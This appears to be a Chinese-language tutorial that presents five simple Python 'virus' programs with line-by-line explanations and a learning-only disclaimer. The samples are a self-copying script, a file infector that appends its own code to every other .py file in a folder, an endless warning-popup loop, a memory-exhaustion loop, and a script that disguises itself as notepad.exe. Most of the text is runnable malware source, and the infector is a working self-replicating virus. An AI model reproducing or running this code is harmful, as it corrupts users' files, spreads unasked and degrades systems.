Python病毒程序基础合集（第一篇）

本篇文章将介绍一些用 Python 编写的简单病毒程序。请注意，这些程序仅用于学习目的，目的是帮助你了解病毒是如何工作的，并加深对 Python 编程的理解。我们强烈建议你仅在合法和道德的框架下使用这些代码，并且不要将它们用于任何形式的恶意活动。

1. 文件复制病毒

一个简单的病毒可以在目标计算机上复制自己。这个病毒的目的是复制自己并在每个新副本中继续传播。

1.1 代码示例：简单的文件复制病毒

import os
import shutil

def virus():
    # 获取当前文件的路径
    current_file = os.path.abspath(__file__)
    
    # 目标文件夹（比如一个系统文件夹）
    target_dir = "C:/Users/Public/Documents"
    
    # 复制病毒到目标文件夹
    try:
        shutil.copy(current_file, target_dir)
        print(f"病毒复制成功到: {target_dir}")
    except Exception as e:
        print(f"复制失败: {e}")

if __name__ == "__main__":
    virus()

1.2 代码解析

os.path.abspath(__file__)：获取当前脚本的绝对路径。

shutil.copy()：将文件复制到指定目录。病毒程序将自己复制到系统目录中，可能导致它在多个位置运行。

target_dir：你可以将它设置为系统的公共目录或其他易于接触的目录，目标是让病毒在其他地方也能被执行。

2. 自我传播病毒

在这种病毒中，程序不仅会自己复制，还会试图在其他的 Python 脚本中嵌入自己的代码。这样当这些脚本被运行时，病毒程序会被激活。

2.1 代码示例：自我传播病毒

import os

def infect():
    # 获取当前脚本的路径
    current_file = os.path.abspath(__file__)
    
    # 扫描当前目录下的所有 Python 文件
    for filename in os.listdir(os.getcwd()):
        if filename.endswith(".py") and filename != os.path.basename(current_file):
            with open(filename, 'r') as file:
                content = file.read()
            
            # 判断文件是否已经感染过
            if "INFECTED" not in content:
                with open(filename, 'a') as file:
                    with open(current_file, 'r') as virus_file:
                        virus_code = virus_file.read()
                    # 在文件末尾添加病毒代码
                    file.write("\n# INFECTED\n")
                    file.write(virus_code)
                print(f"已感染文件: {filename}")

def virus():
    print("这是病毒程序，它将自我传播！")
    infect()

if __name__ == "__main__":
    virus()

2.2 代码解析

os.listdir(os.getcwd())：获取当前目录下所有文件的列表。

open(filename, 'a')：以追加模式打开文件，并在文件末尾添加病毒代码。

# INFECTED：用来标记文件已经被感染过，避免重复感染。

代码会将当前病毒程序的内容附加到每一个其他 .py 文件的末尾。

3. 屏幕劫持病毒

屏幕劫持病毒通过修改系统的显示效果来干扰用户的操作，通常通过改变屏幕颜色或者显示一些警告消息来“恐吓”用户。

3.1 代码示例：屏幕劫持

import os
import time
import ctypes

# 使用 ctypes 调用 Windows API 改变屏幕背景色
def screen_lock():
    ctypes.windll.user32.MessageBoxW(0, "你的计算机已经被感染！", "警告", 0x10)

def virus():
    print("屏幕劫持病毒正在运行...")
    while True:
        screen_lock()
        time.sleep(3)  # 每隔 3 秒显示一次警告

if __name__ == "__main__":
    virus()

3.2 代码解析

ctypes.windll.user32.MessageBoxW：使用 ctypes 调用 Windows API 弹出消息框，模拟屏幕劫持的效果。

time.sleep(3)：让程序每隔 3 秒弹出一次警告信息。

注意： 这个程序只在 Windows 上有效，因为它调用了 Windows 的原生 API 来弹出消息框。如果你是 Linux 或 macOS 用户，这段代码将不会起作用。

4. 程序崩溃病毒

有些病毒会让目标机器上的程序崩溃。这类病毒通常会通过递归或大量消耗内存的方式，使得计算机崩溃或出现卡顿。

4.1 代码示例：让程序崩溃

import time

def crash_program():
    print("准备让程序崩溃...")
    while True:
        crash = [0] * (10**7)  # 不断消耗内存
        time.sleep(1)

if __name__ == "__main__":
    crash_program()

4.2 代码解析

这段代码通过创建大量的内存对象来消耗系统资源，从而使程序变得极其缓慢，甚至崩溃。每次循环都会创建一个大小为 10^7 的列表，不断消耗内存，导致程序的响应速度变得非常慢，最终崩溃。

5. 反病毒检测

为了防止病毒被用户发现和删除，许多病毒程序会加入自我保护机制，避免自己被杀毒软件检测到。这通常涉及到隐藏文件、修改文件名或伪装成其他程序等。

5.1 代码示例：伪装成其他程序

import os
import time
import shutil

def disguise():
    current_file = os.path.abspath(__file__)
    disguise_name = "notepad.exe"  # 伪装成记事本程序
    try:
        # 将病毒文件复制并重命名
        shutil.copy(current_file, disguise_name)
        print(f"病毒伪装成功为 {disguise_name}")
    except Exception as e:
        print(f"伪装失败: {e}")

def virus():
    print("病毒正在伪装...")
    disguise()
    
if __name__ == "__main__":
    virus()